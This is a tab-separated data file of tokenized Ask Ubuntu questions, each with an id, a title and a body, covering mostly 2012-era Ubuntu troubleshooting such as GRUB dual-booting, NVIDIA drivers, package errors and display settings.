148569	which file to associate with the windows boot manager to load grub ?	i installed ubuntu using a live usb . i have a windows partition and used gparted to create an extended partition in order to lay my new distro . when i rebooted my computer after the installation , no boot managers were displayed leaving me with no choice but to use my windows as it 's always been . the only way to use my linux partition then is to let my usb plugged and tell the bios to boot on it ( if so , grub is displayed on boot ) . then i used bcedit for windows to manage the oses at the start . now on reboot , i have the choice between windows 7 or linux ( i managed to create a new entry in the bootmgr file ) . anyways , selecting linux is useless since no file has been related to the entry . my question is : what file on my usb drive is responsible to load grub when booting from it ? if i knew what file on my usb drive were responsible of launching the grub program , i could upload it on my windows drive and relate it to the bcedit program .
148570	how is it possible to install mintmenu in ubuntu 12.04 ?	i know that there were some ppa 's for older ubuntu versions ( 11.04 and previous ones ) , when gnome 2 was the default desktop environment . now , i have installed the mate d.e . on ubuntu 12.04 , but it does not contain the mintmenu . so how can i install it without adding the linux mint repositories to the software sources ?
148571	ubuntu stuck in a login loop after editing profile file	i 'm stuck in a login loop now . what i did was edited /etc/profile as root and added the following line : export path = /opt/my jdk 7 path/bin : $ path after logging out and tried to login , i can not , so i have tried booting in recovery mode , entered root prompt and tried to edit the file in vi but it always opens in read only mode and hence can not be saved . i just need a way to delete that line and boot into ubuntu again . please help me out guys..
148575	how to install zpanel ?	i have bought a new server and installed ubuntu 12.04 . now , how to install zpanel on it ?
148584	nvidia driver 295.53 for geforce 120m is making things blue	the nvidia driver 295.53 for my geforce 120m making some things blue – especially videos . the same thing happens with the cuda developer driver . at first i thought it was just the cuda one , but i guess not . the thing is , my geforce 8800 gts on my desktop has the same driver but no problems . what can i do ?
148592	ubuntu new install . did it wipe my hd ? ( i hope so )	i installed ubuntu last week on an old laptop once running vista . first time linux user . did the new install completely wipe my hd ? including all of the windows crap and documents ? i sure hope so . if not how do i get rid of it . finally , do i need to defrag hd ?
148593	`` package dependencies can not be resolved '' when installing openjdk runtime	when i try to install `` openjdk java 7 runtime '' from the software centre , this happens : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time .
148604	using tv as a monitor : ca n't change from 720 x 480 resolution	i have just installed ubuntu 12.04 on my friend 's pc and he uses a technika 22 '' tv as a monitor . the screen res is horrible . went to change it and it says its a ms telematic 52 '' and wo n't let me change the res from 720 x 480 . i should mention i 'm plugged in via hdmi not vga . please advice .
148618	skype webcam not working in 12.04	i have a logitech quickcam chat that was working fine until i upgraded to ubuntu 12.04 . i had to use preload v4l hack but since then it always worked for three consecutive ubuntu versions . now , when i start the webcam during a call , it works for a few seconds , then it freezes , sortof resets and starts updating the image every 5 seconds , like a slide show . if i go to options and test the video it works fine . the webcam works fine as well with google talk . does anybody have the same problem ?
148619	my rhythmbox plugin ca n't meet the ubuntu software center `` my-app '' requirements	at http : //developer.ubuntu.com/publish/my-apps-packages/ the following technical requirements are cited : technical requirements in order for your application to be distributed in the software centre it must : be in one , self-contained directory when installed be able to be installed into the /opt/ directory ( * ) be executable by all users from the /opt/ directory ( ** ) write all configuration settings to ~/.config/ ( this can be one file or a directory containing multiple configuration files ) a rhythmbox plugin can not satisfy any of these requirements . rhythmbox has compiled-in locations where it looks for installed plugins . so , is there no way for me to publish my app in ubuntu software center ? would it have to go into universe repository ( which would require tremendously more work and political maneuvering to get it accepted ) ? i already have all the debian package infrastructure built for it , so i have made a ppa for it .
148620	how do i install wine x86 components on ubuntu 12.04 x64 ?	i 'm trying to install microsoft office 2010 on my ubuntu 12.04 x64 installation , however , i ca n't install dotnet20 or msxml6 because of x64 and/or preprocessor errors . any ideas on how to do this ?
148621	how can i create a temporary sandbox to compile from source ?	i want to follow the steps found here in order to run league of legends under ubuntu . according to the guide , i have to compile wine from source because it needs some patches . compiling from source involves downloading quite a few dependency packages which i do n't want to get mixed with the system and thus i 'm wondering if there 's a way to somehow isolate the whole `` download dependencies packages and compile '' process as i am only interested in the final wine binary . by isolating the compile process i can just copy the resulting binary and do a simple delete on the sandbox whereas doing it the naive way would require a more complex cleanup .
148623	ubuntu 12.04 suddenly will not boot after compiz crash on lockscreen	yesterday i went to work and closed my laptop . when i got home i could n't get the lock screen to come back up . ctrl+alt+f2 to get to a terminal and tried to kill compiz , compiz was not running so i tried to restart it got an error opening the display so i tried to restart lightdm again could n't open display . so i restarted and now i am stuck on the loading screen . i tried booting in recovery mode and all options hang except root , but i 'm stuck with read only . booting from a live cd i can mount the drive but again stuck with read only . i 'm completely stuck here . checking my default-display-manager returns `` /usr/sbin/elsa '' as the only line and ca n't edit it . i 've got an 11.10 live cd and my /home is encrypted so i ca n't try to back anything up at the moment either . how can i resolve this or at the least back up some of my data ? please help !
148625	how to make bumblebee work with hp pavilion dv6t-7000 quad edition with intel hd 4000 and nvidia geforce gt 650m 2gb ?	i just recently bought a hp dv6t-7000 quad edition . it has an intel hd 4000 and a nvidia geforce gt 650m 2gb with optimus . i read that i could use bumblebee to make optimus work , so i installed it . i also installed bumblebee-nvidia and nvidia-current from the ubuntu-x-swat/x-updates ppa . i rebooted , but when i tried to run anything with optirun , the computer would wait ten seconds or so , then do a hard shutdown . i got no log messages from bumblebee , xorg , or optirun , either . i have purged and reinstalled bumblebee , bumblebee-nvidia , and nvidia-current . i have also turned off power management for nvidia in the bumblebee.conf file to no avail . i am out of ideas about this , and i need both graphics options . any ideas would be much appreciated . update : today ( 6/14/12 ) , i updated my kernel ( to version 3.2.0-25 ) and reinstalled bumblebee-nvidia and nvidia-current ( from ppa : upubuntu-com/nvidia with driver version 295.59 ) so the new driver would build against the new kernel . i noticed several things : optirun worked ( with various errors ) . i had to modprobe nvidia-current and modprobe -r nvidia-current before i got optirun to stop telling me that the card fell off the bus . once i did that , i was able to run non-opengl applications with optirun ; however , running opengl applications would give me the error xlib : extension `` glx '' missing on display `` :8 '' . looking this up quickly yielded the following page : https : //github.com/bumblebee-project/bumblebee/wiki/troubleshooting which listed my issue . following the instructions in the section resulted in my having the same issue ( shutdowns ) that i posted about originally . i also found this article , where someone said in the comments that he experienced the same issue if he did not run a cuda program before running optirun . ( comment number 9 ) . i will try this and see if it works , if it does maybe i can add a quick cuda program to my init scripts ? thanks to everyone who already replied , i really appreciate your help . update # 2 : today ( 6/23/12 ) , i switched to the xorg-edgers ppa to see if the newer drivers/xorg/etc would fix my problem . now i 'm getting the same errors listed above in numbers 1 , 2 , and 3 . i have not tried step 4 yet because i do not want to wreck something up like i did last time ( at least now non-gl applications run ) . also , cuda is getting me nowhere due to make errors , so for now , that 's out of the question .
148629	what to do when a bootable usb stick does n't work properly ?	currently i have ubuntu 11.10 as an os and i want ubuntu 12.04 lts . i made a bootable usb stick with the program startup disk creator . everything went well ( i chose the language , and then i chose 'install ' ) , the purple screen with the title 'ubuntu ' came up and it started loading too . after some time black screen came up with white letters . last sentence was something like : panic occurred , switching back to text . i tried it several times , the same thing happens . i tried clicking on try ubuntu from usb too but it did n't work either .
148631	how do you edit the blacklist.conf file ?	is it possible to edit the blacklist.conf file when running linux off a live cd ? if so , how do you edit it ? i tried typing this into the terminal but nothing happened : gksudo gedit /etc/modprobe.d/blacklist.conf
148633	how to get lvm and raid1 going in 11.10 server ?	i screwed up my partitioning apparently trying to get lvm and raid1 going . the machine is an intel dual core dt with 2 gb of ram and 2 sata drives , one 250g and the other 500g . have onboard gigabit ethernet that apparently uses same driver as realtek 811c . i installed a pcie gigabit card also 811c . at several points the eth0 has accessed the internet fine , but the eth1 will not communicate . i saw a `` fix '' for this online which from root : rmmod r8169 . this immediately killed the working onboard card . i tried to re-install 11.10 figuring that would re-install r8169 . however i messed something up in my partitioning and ca n't get a clean boot now . so i think after 12 re-installs or so and 2 days . i can get through it right if i can start over with clean drives , but i ca n't figure out how to empty them out with soft raid and lvm partitions . seems like i 've had it going well and then trying to fix that one little problem , i go backwards .
148635	should i install ia32-libs or lib32stdc++ or can i just use -- force-all for 32-bit printer driver	i got a brother printer mfc class . the brother website only provides 32-bit drivers but i installed 64-bit ubuntu . it says i need to install `` ia32-libs '' or `` lib32stdc++ '' to install the 32-bit drivers onto 64-bit ubuntu . elsewhere i 've read that i do n't need to install these packages , i can just use -- force-all when installing , but i do n't know of the accuracy of this information . my questions : 1 ) do i have to install `` ia32-libs '' or `` lib32stdc++ '' or can i use -- force-all to make 32-bit drivers install on 64-bit ubuntu ? 2 ) if i do have to install `` ia32-libs '' or `` lib32stdc++ '' , which should i install ? which is better , which is recommended by ubuntu experts ?
148636	after update , audio wo n't play through hdmi cable	yesterday ( june 7th ) i faithfully updated a bunch of stuff through update manager ( though i 'm not sure what since i never read what i updated any more because i 'm a bad person ) . afterward , i discovered that i could no longer play audio through my tv via hdmi . the sound settings menu seems to have completely changed and the shell script that i wrote a week ago ( with much pain and effort as i had never before written a shell script ) to toggle between my laptop speakers and the hdmi cable output no longer works . when i type in pactl set-card-profile 0 output : hdmi-surround in the command line i get failure : no such entity presumably this means something with pulse audio changed but , while i 'm learning a lot about the inner workings of ubuntu/linux , i 'm not an expert and would love some help . edit : so i noticed that pactl set-card-profile 0 output : hdmi-stereo seems to get everything working , so the name of the hdmi output just changed . still , should n't there be a way to switch to hdmi through the gui as well ?
148638	how do i enable the `` universe '' repository ?	how do i get to universe repository of ubuntu software as mentioned in ubuntu 12.04 lts ? i am installing 12.04 ubuntu . please help .
148646	force startx to run x in a specific resolution and refresh rate	from my past experience ( using win-xp ) , this particular monitor works only on 60hz , best resolution being 1024x768 . i have `` installed and configured '' ubuntu 12.04 minimal ( on usb stick ) so that most of the time terminal is used , however , whenever there is a need to enter gui , i may issue startx command to go into gnome . however the problem is that on this particular system , issuing this command poses problem because its default refresh rate wo n't synchronize with the monitor . the display keep on flickering and utterly unreadable . it is visible that gnome has been loaded and default wallpaper and desktop items are visible . but the problem is due to refresh rate different than 60hz . i am looking for a command attribute to startx command which will force the refresh rate to 60hz and resolution preferably to 1204x768 i can open terminals with ctrl+alt+t and enter commands . key combinations like ctrl+alt+numplus works flawlessly in distributions like solaris , but it 's not working for me . also the commands like xrandr -r 60 60 being refresh rate wont work . the same problem is faced even when i boot from a live cd
148654	how to install a new version of a font ?	i have installed a font using font viewer , when a new version of the font showed up , i downloaded it , after hitting the `` install font '' , the button text changes to `` install failed '' . what to do ?
148655	how do i correctly upgrade the kernel on ubuntu 10.04 lts ?	i 'm trying to upgrade the linux kernel from 2.6.32-34 to the latest update of that series , which appears to be 2.6.32-34 . i ran : sudo apt-get update sudo apt-get upgrade at this point i was told that some packages were kept back : the following packages have been kept back : landscape-common linux-headers-server linux-image-server linux-server i proceeded to install those and then to autoremove the kernel ( that 's what apt-get recommended ) : sudo apt-get install linux-headers-server linux-image-server linux-server sudo apt-get autoremove my problem is that after booting , and running uname -a i still get the 2.6.32.34 kernel . how can i guarantee that the latest kernel will be loaded ? thank you in advance .
148661	how can i start a game/program with the nvidia gpu in the right click menu ?	i wanted to create a script so i can start a game/program with the nvidia gpu . so that when i right-click , i get a option in the menu `` run with nvidia card '' ( note : i am using bumblebee ) i tried various things , but until now i dont have succes . can someone please help me ?
148662	how to get grub2 to remember last choice ?	grub2 - community ubuntu documentation says the following : saving an os can be achieved by running sudo grub-set-default if default=saved is set in /etc/default/grub . it may also be saved if grub_savedefault=true is also set in /etc/default/grub . in this case , the default os remains until a new os is manually selected from the grub 2 menu or the grub-set-default command is executed . i put the lines default=saved and grub_savedefault=true in /etc/default/grub , and ran sudo grub-set-default . here is the output : $ sudo grub-set-default entry not specified . usage : grub-set-default [ option ] entry set the default boot entry for grub . -h , -- help print this message and exit -v , -- version print the version information and exit -- boot-directory=dir expect grub images under the directory dir/grub instead of the /boot/grub directory entry is a number or a menu item title . report bugs to < bug-grub @ gnu.org > . am i not following the documentation correctly ? what 's the correct way to do this ?
148665	best ways to keep ubuntu free from cluttering ?	there are no programs like disk clean-up or defragmentation in ubuntu , so do we really need it ... or if there are some utility packages for ubuntu .
148667	will grub overwrite easybcd entry if i already have windows 7 and windows xp installed ?	installing ubuntu on eee pc which already has windows 7 and windows xp in dual boot using easy bcd i have an asus eee pc 1015pem with windows 7 starter and windows xp in dual boot configuration on separate partitions . now i want to replace my windows xp with ubuntu 11 . earlier after installing xp on my system it failed to boot in windows 7 , which i restored easily using easybcd . if i install ubuntu 11 will i be able to boot my windows 7 also ? will grub overwrite the easybcd entry for xp ?
148668	how to revert to default video driver from nvidia driver ?	i downloaded the nvidia driver , and it seems to be messing things up . webcam programs dont work , blender isnt working . i need to revert to the default one . any help ! ? this one doesnt make any since to me . how do i revert from the nvidia driver to the unrestricted driver ?
148673	ca n't enter ubuntu 12.04 after installing windows on a separate	i 've installed windows on a separate partition than ubuntu but now i ca n't enter ubuntu it just automaticaly boots to windows ! please help .
148679	problem with bluetooth ubuntu 12.04	i ca n't connect with my nokia phone via bluetooth . it 's already added to devices..i ca n't browse it , nor send files . on ubuntu before , there was n't problem . what should i do ? thanks in advance .
148681	when i encrypt my home directory in ubuntu , how does it affect programs trying to access my home directory ?	i installed ubuntu 12.04 a few weeks ago and am considering encrypting my home directory . excuse the fuzzy thinking but , if the directory is encrypted and i am actively using various programs , is it un-encrypted ? , partially un-encrypted , or unchanged and still encrypted ? i found this on another site . will it work ok ? sudo apt-get install ecrypt-utils sudo ecryptfs-migrate-home -u username thank you , matthew
148684	how to install psychonoauts through software-center ?	i have been trying to install psychonauts through the ubuntu software centre . the purchase went smoothly but the installation hangs on both my ubuntu 12.04 desktop and laptop . when purchasing the game it states '4.4 gb to download , 5.5 gb when installed' when clicking on the progress tab in ubuntu software centre it seems to be hanging at '2.1 gb of 130.6 mb ' ( this is not a typo ) . anyone have any idea how i can solve this ?
148685	how to create a complete recovery image for my new netbook	i just got a new acer netbook , it comes with windows 7 . i wanted to know how i could create a recovery image using tools like dd . i want to know what command creates the exact backup of the hard disk and how i could restore it incase things go wrong when i try to install linux . i have an external hard disk on which i will store this image and a bootable usb drive with ubuntu 12.04 . if this is n't the best way then do suggest alternatives .
148688	getting unity 3d working on legacy nvidia fx5500 card	i installed the latest nvidia drivers for my fx5500 card . i understand that the x server version does not officially support this driver or card but was wondering what i can do to get compiz running . i have researched for hours on this issue but can not come up with an answer for myself . i might be doing all this for nothing but i wanted to at least try . here is the output of my test : mike @ mike-linux-box : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce fx 5500/agp/sse2 opengl version string : 2.1.2 nvidia 173.14.35 not software rendered : yes not blacklisted : no glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no so i was wondering what is the `` not blacklisted '' test ? is this the nouveau blacklisting ? nvidia driver did that automatically . does this need to be removed ? any help would be appreciated . i just want to run compiz effects . thanks .
148689	how to resolve `` something wicked happened resolving 'your_proxy : 800 ' '' ?	i am not able to install any packages from terminal or software center . something wicked happened resolving 'your_proxy : 800 ' ( -5 - no address associated with hostname ) . this error pops up . i need help .
148690	how do i lock the screen after resuming from hibernation ?	i 've been able to successfully hibernate and resume my ubuntu 12.04 desktop pc using procedure that i 've documented in this answer . however , i now have a problem that whenever the pc resumes , it does not locks the screen . how can i lock the screen after the system resumes back from hibernation ?
148693	how do i install cacti ?	i 'd like to use cacti , but i 'm not entirely sure how to install it . i have a 10.04 server that i 'm installing this on .
148695	how can i change from meego to ubuntu ?	i have meego installed on my newly bought netbook . i want to change to ubuntu . i have no files that i want to save or anything and i am completely new to linux . can someone give me a simple step by step guide ?
148700	most effective way to connect to an ubuntu vps from windows ?	i have a vps with ubuntu 10.04 x64 , i used freenx , and it 's lacking . is there an application with better compression algorithm ( s ) ?
148715	how to fix `` package is in a very bad inconsistent state '' error ?	i ca n't update my system because it freezes while installing a third-party update ( zramswap-enabler ) ! sometimes i get the following message in update manager : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : the package zramswap-enabler needs to be reinstalled , but i ca n't find an archive for it . i tried to remove the zramswap-enabler , but it 's impossible because i get the following message : dpkg : error processing zramswap-enabler ( -- remove ) : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . errors were encountered while processing : zramswap-enabler e : sub-process /usr/bin/dpkg returned an error code ( 1 ) actually i would really reinstall that package , but it is unable to do it ! if i remove this third-party ppa then the system is warning me about a very very serious problem . so why can i not install/reinstall/remove/update this package and why freezes the updater if i try to update ?
148716	how to install ubuntu in dell xps 17 ?	i am a bit of a noob when it comes to linux . i have a basic understanding but struggle with the more complex things . i am using a dell xps 17 ( l207x ) which has a core i7 processor and nvidia gt555m hybrid card and can not get a successful installation of any ubuntu distro from 11.xx upwards . could anyone offer any help / advice / step by step instructions to help me get a successful installation of at least 11.10 as that is the distro i was using on my old laptop ?
148717	how do i boot into the console and then launch the ubuntu desktop from it ?	at the ubuntu login page i have to hit ctrl+alt+f1 to be able to login as an user using the command line . but how do i get to the command line first and then start the ubuntu desktop from it ?
148718	windows no longer boots on dual-boot system	while trying to delete an ubuntu partition from my hdd i accidentally rebooted my computer . ( note : the partition was originally made from an existing partition using paragon . ) after that when i tried to start the computer i got the grub rescue terminal prompt . i was n't able to do much from that , but i did manage to boot ubuntu from a usb drive and to run boot-repair . but now when i try to select windows 7 from the boot selection menu i get the error 0xc0000225 . here is the link to the bootinfo summary created by boot-repair : http : //paste.ubuntu.com/1032584/ i have a lot of very important data on my hdd and i would really appreciate your help . the problem was solved with chkdsk from the windows 7 recovery cd . thank you all for your help .
148725	laptop screen blank after login when external monitor is not connected	ubuntu does not switch back automatically to only monitor present when booting after disconnecting external monitor . here 's a video showing what happens . i get to the login window and everything looks ok , then i type my password , the desktop image shows up and ... everything goes blank . it does not happen when i just login as a guest . when possible i work with my laptop connected to an external screen via the vga port . the problem comes when i boot the computer without that secondary screen connected : the login screen comes out ok. after login the screen goes black , but i can hear the login sound . if i hit ctr + alt + backwards-delete and login again sometimes it is fixed , but not all . if i log in as a different user everything is ok. then i log in as my user and sometimes it works . to have a screen i have to plug a monitor . although i have turned on the laptop display with that monitor on , if i reboot it goes blank again after login , even if i turn off the external monitor before turning off the computer . i 've managed to get my screen back with my username after going into recovery mode , but only sometimes . failsafe would not load after second screen asking me what i wanted to do ( no mouse to click nor keyboard working ) . my computer is a ldlc aurore bb1-i5 -8 -s1 . which is the configuration file that keeps the information about the monitors using displays under lightgdm and where is it ? i guess if i could edit it i may have a chance : ) one of the things i tried following a solution in another post was removing my monitors.xml file , but it does not work and i do n't know how to create a good one that i could use now . when doing display=:0 xrandri get : screen 0 : minimum 320 x 200 , current 320 x 200 , maximum 8192 x 8192 lvds1 connected ( normal left inverted right x axis y axis ) 1366x768 60.0 + 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) this is the full dmesg after activating sudo xdiagnoseas bryce sugested . ( if you tell me the relevant parts i will paste them here ) when conecting the external monitor , only the external will work , although i can see using displays that the computer thinks that both are working . i 've asked the question in launchpad but have it keeps on expiring without any feedback . in my opinion ubuntu should be able to detect automatically that there is no external monitor present and switch to the laptop monitor . there 's a similar question here , but it does not apply to my case external monitor set as primary even when disconnected from laptop update : for clarification , the problem happens only with my user and once i log in . i even get to see the screensaver for about a second , and then it goes blank . tried bryce 's example ( see his answer below ) , but it did not work . this is the info i get from tty1 with display=:0 xrandr : â ramon suarez jul 9 at 16:36 screen 0 : minimum 320 x 200 , current 320 x 200 , maximum 8192 x 8192 lvds1 connected ( normal left inverted right x axis y axis ) 1366x768 60.0 + 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis )
148726	what is an acpi gpe storm ?	just experienced a system freeze ( no touchpad , no keyboard , screen looked normal ) , alt/sysrq/reisub did n't work , had to press the start button . in var/log/kern.log i find `` acpi : ec : gpe storm detected , transactions will use polling mode '' around the time of the freeze . the next entry is the first action of the next reboot . could this be related , and what could it mean ? i 'm also experiencing frequent program crashes , always segfaults and/or sigsevs mentioned in the crash report , the programs this is happening too seem random ( mplayer , clementine , gnome subtitles , openshot , ... ) , but these never damage the system , i can always continue my work . all this makes me a bit worried about the stability of my system ... ubuntu 12.04 , 64-bit , 3.2.0-25-generic kernel , intel® core™ i5-2430m cpu @ 2.40ghz × 4
148728	how do i enable nepumuk on lubuntu ? - `` the nepomuk backup service does not seem to be running ''	i want to start backing up my lubuntu 12.04 machine ( on an hp netbook ) using the built-in nepomuk service . it was recently upgraded from 11.10 and i dimly remember having the same problem a few months ago , though i did not do anything about it . anyway : when i try to open nepomuk backup , i get the following error message : `` the nepomuk backup service does not seem to be running '' now , i would like to enable nepomuk , but i can not find the switch . i have googled for this problem , but it only brings up ubuntu answers ( like here ) with lots of packet talk that i do not understand . so here is my question : how do i enable nepomuk ? and - by extension - how do enable it at startup ?
148735	calendar / unity integration / thunderbird without a google account	as many others , i 'm a looking for a calendar with unity integration . there is the calendar-indicator applet ( ppa : atareo ) . but it means having a google account . for some reasons , i do n't want to use a google account to do that . so , how could i do ? it seems that using an owncloud server could be a solution to avoid a google account , and can be used with tb without evolution . but what about the unity integration ? have you some tips about that ? i do hope a well integrated calendar app ( = syncing with both unity and tb ) is going in ubuntu next releases ... thanks for your ideas ...
148740	how can i operate on the active x display using a command in the console ?	i have problems where compiz freezes and i have to switch to another console ( ctrl+alt+f1 ) to restart . but it would be easier if i could just do `` $ compiz -- replace '' in the other console and not have to lose work or anything . but when i do this it says it ca n't open the display , makes sense because the display is open in console 7 . is there any way i can easily redirect a command to another console for it to be run there ? like for instance , be in console 1 and execute `` $ compiz -- replace '' on console 7 ?
148742	how to make jwm work in ubuntu 12.04 ?	i have installed the jwm on ubuntu 12.04 via the software centre , but it does n't work . when i choose the jwm session from lightdm , it only shows a black screen . it worked when i had another computer with ubuntu 11.10 , where i had the same problem after the jwm installation . but once , by chance , i chose to start jwm from a fluxbox session . and after that , i was able to start jwm also from lightdm . but this solution does not work for me on ubuntu 12.04 . jwm never starts .
148743	ca n't connect to wireless on lubuntu	i have a cisco pci lan+wlan 802.11b card in my ibm thinkpad t30 laptop . is this wireless card compatible with lubuntu ? i have lubuntu installed and it just wo n't connect . it keeps saying that it is trying to configure then it says that it is connected but it does not work . i know that the wireless network is working correctly because i can connect to it with all my other devices and it works on this very same laptop when i am running windows . i added the following commands to blacklist.conf , but still no luck blacklist padlock_aes blacklist geode_aes
148744	double audio cd ripping weirdness	since i installed ubuntu 12.04 , rhythmbox , banshee and sound juicer have started acting weird around double cd 's , and specifically , cd # 2 of said double cd . sometimes , they will show the information of cd # 1 . track names , durations , and even count are incorrect . sometimes , they will first show the tracks for cd # 1 , then continue onto cd # 2 if cd # 2 has more tracks than # 1 . sound juicer seems to be unable to find any track durations at all , even for single cd 's . obviously , this is a pain when i 'm trying to rip double cd 's . and i have a fair number of them , which i want to rip . this happens on both my machines ( a slightly aging imac , and a 1-year-old sony vaio ) . however , on previous versions of ubuntu , this never happened . all on the same machines . so i suspect 12.04 is using a different lib for extracting audio cd data . just for kicks , i tried with linux mint 13 , and there it works correctly , even though it claims to be based on ubuntu 12.04 and therefore should be using ( partially ) the same software . so if the mint guys can fix it , i should be able to do it too , right ? so , my question : what changed in 12.04 that could cause this ? and more importantly : what can i do to fix it ? update installed versions of relevant software packages , according to synaptic : libmusicbrainz3-6 : 3.0.2-2.1 libmusicbrainz4-3 : 4.0.0-0ubuntu1 sound-juicer : 3.4.0-1ubuntu1 rhythmbox : 2.96-0ubuntu4
148749	accessing an old hard drive on a usb adapter with ubuntu 11	i am in search of the information that will help me access my old 3.5inch on an external usb adapter , with my laptop . or if someone can tell me how to do that right here that would be better . thanks
148750	how can i make the windows game feltstars work on ubuntu ?	feltstars.com is a windows download , how can i make that work with ubuntu ? i 'm using 12.04 just downloaded and installed it last night . by the way , i do not want to have both windows and ubuntu operating systems , i only want to use ubuntu , can i make the felt stars program work
148752	do the latest intel core i3/i5/i7 processors just work ?	i am thinking of buying a new laptop , and need ubuntu as my os . is it true that the latest intel i3 , i5 , i7 cpus work properly immediately after install , or do i need to install some additional software/drivers for them to work ? i 'm just curious if it is that simple , and i did n't find this answer searching the internet .
148755	netbeans 7.1.2 not available after installation in ubuntu 12.04	i have upgraded to ubuntu 12.04 . i downloaded netbeans from the netbeans site with a .sh file . followed the instructions chmode +x < filename.sh > .. no response . it required me to update jdk and jre . yet i am not able to find the netbeans ide application . am i missing something ? please help . setting a foot into netbeans from eclipse but almost stuck .
148757	ubuntu server 12.04 wo n't boot	i updated to 12.04 yesterday and my server freezes at the login screen . here 's my syslog . upon further inspection , i see that it freezes because it ca n't start mysql .
148759	boot problem ubuntu 12.04	i installed ubuntu 12.04 but the system crashed and now will not boot from the hard drive , i can only start from the cd rom . i already formatted and reinstalled ubuntu , but when i start a message appears from the disk power management ( often outside ) then the screen goes black and nothing happens .
148761	gnome touchpad control vs. synaptics	there are several settings ( speed , sensitivity , acceleration , tap-to-click ) that seem to be independently managed between the built-in gnome mouse and touchpad configuration tool and synclient ( gpointing-device-settings ) . changes i make in the gnome tool do n't show up in synclient and vice versa . this is confusing , and the interactions seem to be making my touchpad very jerky . ( i have an hp folio 13 notebook . ) can someone explain how these tools interact , and suggest best practices for configuring my touchpad ?
148765	ubuntu does n't work with 3d acceleration in virtualbox	running virtualbox on a pc . i have virtualization enabled in bios . installed ubuntu 12.04 32 bit on virtualbox without 3d acceleration enabled and it works fine , but when i enable it and restart , the desktop shows up but there is nothing on it or on the top menu bar . things are clickable where they should be but you ca n't see what you 're clicking . what 's wrong ?
148767	help do i install the ralink rt3070 wireless driver ?	i bought an aztech wl562usb wireless adapter and am stuck trying to install the driver . the driver file i downloaded is a bz2 , called 2011_0719_rt3070_rt3370_rt5370_rt5372_linux_sta_v2.5.0.3_dpo.bz2 how can i install the driver from this bz2 file ?
148772	does it damage or increase wear on computer to use sleep ( instead of shutdown ) for days on end ?	if i go many days without shutting down the computer and instead just put it to sleep , is there risk of any damage occurring to my computer ? is this not recommended or bad for the computer in any way ? sleep does cause a small icon to light up on my computer , will this prematurely burn out this light or prematurely wear out anything ?
148775	which one is the official ubuntu channel ?	i found 2 ubuntu channels on youtube , celebrateubuntu and planetubuntu . both had similar names , but planetubuntu had more videos . which one is the official ubuntu channel ?
148776	how do i set up puppet storedconfigs ?	i 'd like to set up puppet storedconfigs . how do i do that ? i 've followed the steps here and here to set up my puppet master and to enlist a server ( respectively ) . how can i set up storedconfigs ?
148782	intel i7 7320qm 64 or 32 bit ?	well , i 've recently bought an alienware m17x and it has and intel processor , which i 've never had before . my last computer had an amd processor , which ran only ubuntu 64 bit . i had installed ubuntu 32 bit first , but i had lots of problems , and one of them was the machine temperature , that gets lot hotter when running a 32 bit version . my new processor is an intel 7320qm and it runs windows 7 64 bit fine . but like my older machine used to run windows vista 32 bit fine , but not ubuntu 32 bit . it does n't make sense at all . so i need to know if one of you guys have ever experienced something like this befor ? which version should i get for my intel processor , 32 or 64 bit ?
148784	how to avoid mouse getting stuck with multiple monitors of different sizes	i have two monitors . one is 1920x1080 ( the left screen ) , and the other is 1440x900 ( the right screen ) . i am using ubuntu 12.04 . right now , i have it set up such that the tops of both monitors are aligned . that way , when i have my mouse at the very top of the left screen and i move my mouse to the right , it will move seamlessly to the right screen . however , if my mouse is on the bottom 180 pixels of the left screen and i move my mouse to the right , it wo n't move to the right screen , so i have to move my mouse up before i move it to the right because the right screen is smaller than the left screen . my desired functionality : if i am at the bottom of the left screen and i move my mouse to the right , it should appear at the bottom of the right screen . thanks !
148789	remove lubuntu entries from login screen	after i uninstalled the lubuntu desktop package ( lubuntu-desktop ) , the lubuntu entries on the login screen are still present . how can i remove them ?
148791	ambiguous package name 'libgdk-pixbuf2.0-0 ' with more than one installed	i tried to update my system ubuntu 12.04 64bit on amd phenomiix4-955be . the power failed this afternoon , not once , but twice in a row . i knew that something was going to cause an issue . i recently resolved the dpkg issue with multiarch i386 ( unkown ) , i just commented it out . now i am getting this odd error . below is a printout of the terminal . i have had some issues with wine before , and currently use virtualbox . i obviously started with removing in this instance . i am a novice with linux , but can get around the cli . please help ! root @ unimatrix725-24219 : ~/documents # apt-get remove wine reading package lists ... done building dependency tree reading state information ... done package wine is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.5-0ubuntu1~ppa1~precise1+pulse17 ) but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ unimatrix725-24219 : ~/documents # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : xdg-user-dirs-gtk libgvnc-1.0-dev telepathy-indicator udisks2 indicator-printers ekiga ttf-umefont libopal3.10.2 gedit-common gcalctool telepathy-logger lp-solve gnome-backgrounds telepathy-gabble aisleriot gtali glchess libpurple-dev system-config-printer-gnome hamster-applet gir1.2-gtk-vnc-2.0 gucharmap gnome-games link-grammar-dictionaries-en cheese libdjvulibre-dev libots0 unity-lens-video gnobots2 gnome-disk-utility gnome-icon-theme-extras unity-scope-video-remote telepathy-haze gedit libgexiv2-1 swish++ empathy-common libcheese-gtk21 abiword gnome-sudoku abiword-common transmission-gtk lightsoff libcheese3 libjson-glib-dev telepathy-idle seahorse empathy libcapi20-3 libunity-misc4 libgoffice-0.8-8-common vinagre libtotem0 libaprutil1-ldap libopenexr-dev telepathy-salut gnibbles gnuchess-book 